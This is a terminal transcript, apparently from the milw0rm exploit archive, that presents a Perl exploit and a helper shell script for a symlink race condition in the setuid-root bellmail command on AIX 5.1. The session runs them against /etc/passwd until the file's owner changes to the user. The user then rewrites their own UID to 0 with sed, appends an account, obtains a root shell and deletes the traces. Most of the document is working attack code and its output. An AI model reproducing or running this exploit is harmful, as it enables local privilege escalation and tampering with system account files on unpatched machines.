-bash-2.05b$ -bash-2.05b$ cat x_aix5_bellmail.pl #!/usr/bin/perl # FileName: x_aix5_bellmail.pl # Exploit "Race condition vulnerability (BUGTRAQ ID: 8805)" of /usr/bin/bellmail # command on Aix5 to change any file owner to current user. # #Usage : x_aix5_bellmail.pl aim_file # aim_file : then file wich you want to chown to you. # Note : Maybe you should run more than one to "Race condition". # The file named "x_bell.sh" can help you to use this exp. # You should type "w" "Enter" then "q" "Enter" key on keyboard # as fast as you can when bellmail prompt "?" appear. # # Author : watercloud@xfocus.org # XFOCUS Team # http://www.xfocus.net (CN) # http://www.xfocus.org (EN) # # Date : 2004-6-6 # Tested : on Aix5.1. # Addition: IBM had offered a patch named "IY25661" for it. # Announce: use as your owner risk! $CMD="/usr/bin/bellmail"; $MBOX="$ENV{HOME}/mbox"; $TMPFILE="/tmp/.xbellm.tmp"; $AIM_FILE = shift @ARGV ; $FORK_NUM = 1000; die "AIM FILE \"$AIM_FILE\" not exist.\n" if ! -e $AIM_FILE; unlink $MBOX; system "echo abc > $TMPFILE"; system "$CMD $ENV{LOGIN} < $TMPFILE"; unlink $TMPFILE; $ret=`ls -l $AIM_FILE"`; print "Before: $ret"; if( fork()==0 ) { &deamon($FORK_NUM); exit 0 ; } sleep( (rand()*100)%4); exec $CMD; $ret=`ls -l $AIM_FILE"`; print "Now: $ret"; sub deamon { $num = shift || 1; for($i=0;$i<$num;$i++) { &do_real() if fork()==0; } } sub do_real { if(-e $MBOX) { unlink $MBOX ; symlink "$AIM_FILE",$MBOX; } exit 0; } #EOF -bash-2.05b$ -bash-2.05b$ cat x_bellmail.sh #!/bin/sh #File:x_bellmail.sh #The assistant of x_aix5_bellmail.pl #Author : watercloud@xfocus.org #Date :2004-6-6 # X_BELL_PL="./x_aix5_bellmail.pl" AIM=$1 if [ $# ne 1 ] ;then echo "Need a aim file name as argv." exit 1; fi if [ ! -e "$1" ];then echo "$1 not exist!" exit 1 fi if [ ! -x "$X_BELL_PL" ];then echo "can not exec $X_BELL_PL" exit 1 fi ret=`ls -l $AIM` echo $ret; echo fuser=`echo $ret |awk '{print $3}'` while [ "$fuser" != "$LOGIN" ] do $X_BELL_PL $AIM ret=`ls -l $AIM` echo $ret;echo fuser=`echo $ret |awk '{print $3}'` done echo $ret; echo #EOF -bash-2.05b$ id uid=201(cloud) gid=1(staff) -bash-2.05b$ -bash-2.05b$ oslevel 5.1.0.0 -bash-2.05b$ oslevel -r 5100-01 -bash-2.05b$ ls -l /usr/bin/bellmail -r-sr-sr-x 1 root mail 30208 Aug 09 2003 /usr/bin/bellmail -bash-2.05b$ ls -l /etc/passwd -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd -bash-2.05b$ cp /etc/passwd /tmp/ -bash-2.05b$ ./x_bellmail.sh /etc/passwd ./x_bellmail.sh[11]: ne: 0403-012 A test command parameter is not valid. -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd From cloud Sun Jun 6 08:49:30 2004 abc ? w From cloud Sun Jun 6 08:25:20 2004 abc ? q -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd From cloud Sun Jun 6 08:49:35 2004 abc ? w From cloud Sun Jun 6 08:25:20 2004 abc ? q -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd From cloud Sun Jun 6 08:49:40 2004 abc ? w From cloud Sun Jun 6 08:25:20 2004 abc ? q -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd From cloud Sun Jun 6 08:49:43 2004 abc ? w From cloud Sun Jun 6 08:25:20 2004 abc ? q -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd w From cloud Sun Jun 6 08:49:48 2004 abc ? From cloud Sun Jun 6 08:25:20 2004 abc ? w bellmail: cannot append to /home/cloud/mbox ? w bellmail: cannot append to /home/cloud/mbox ? q -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd From cloud Sun Jun 6 08:49:56 2004 abc ? w From cloud Sun Jun 6 08:25:20 2004 abc ? q -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd Before: -rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd From cloud Sun Jun 6 08:50:01 2004 abc ? w From cloud Sun Jun 6 08:25:20 2004 abc ? q -rw-r--r-- 1 cloud staff 570 Jun 03 22:59 /etc/passwd -rw-r--r-- 1 cloud staff 570 Jun 03 22:59 /etc/passwd -bash-2.05b$ cat /etc/passwd root:!:0:0::/:/usr/bin/ksh daemon:!:1:1::/etc: bin:!:2:2::/bin: sys:!:3:3::/usr/sys: adm:!:4:4::/var/adm: uucp:!:5:5::/usr/lib/uucp: guest:!:100:100::/home/guest: nobody:!:4294967294:4294967294::/: lpd:!:9:4294967294::/: lp:*:11:11::/var/spool/lp:/bin/false invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico snapp:*:177:1:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd imnadm:*:188:188::/home/imnadm:/usr/bin/ksh cloud:!:201:1::/home/cloud:/usr/local/bin/bash -bash-2.05b$ cat /tmp/passwd |sed 's/cloud:!:201:/cloud:!:0:/' >/etc/passwd -bash-2.05b$ su cloud cloud's Password: 3004-502 Cannot get "LOGNAME" variable. -bash-2.05b$ id uid=201 gid=1(staff) -bash-2.05b$ ls -l /etc/passwd -rw-r--r-- 1 201 staff 568 Jun 06 08:56 /etc/passwd -bash-2.05b$ echo 'test:!:201:1::/home/cloud:/usr/local/bin/bash' >> /etc/passwd -bash-2.05b$ cat /etc/passwd root:!:0:0::/:/usr/bin/ksh daemon:!:1:1::/etc: bin:!:2:2::/bin: sys:!:3:3::/usr/sys: adm:!:4:4::/var/adm: uucp:!:5:5::/usr/lib/uucp: guest:!:100:100::/home/guest: nobody:!:4294967294:4294967294::/: lpd:!:9:4294967294::/: lp:*:11:11::/var/spool/lp:/bin/false invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico snapp:*:177:1:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd imnadm:*:188:188::/home/imnadm:/usr/bin/ksh cloud:!:0:1::/home/cloud:/usr/local/bin/bash test:!:201:1::/home/cloud:/usr/local/bin/bash -bash-2.05b$ su cloud cloud's Password: bash-2.05b# id uid=0(root) gid=1(staff) bash-2.05b# ls -l /etc/passwd -rw-r--r-- 1 test staff 614 Jun 06 08:58 /etc/passwd bash-2.05b# cp /tmp/passwd /etc/passwd bash-2.05b# chown root /tmp/passwd bash-2.05b# ls -l /tmp/passwd -rw-r--r-- 1 root staff 570 Jun 06 08:48 /tmp/passwd bash-2.05b# id uid=0(root) gid=1(staff) bash-2.05b# bash-2.05b# rm /tmp/.bel* bash-2.05b# rm /tmp/passwd bash-2.05b# # milw0rm.com [2005-05-19]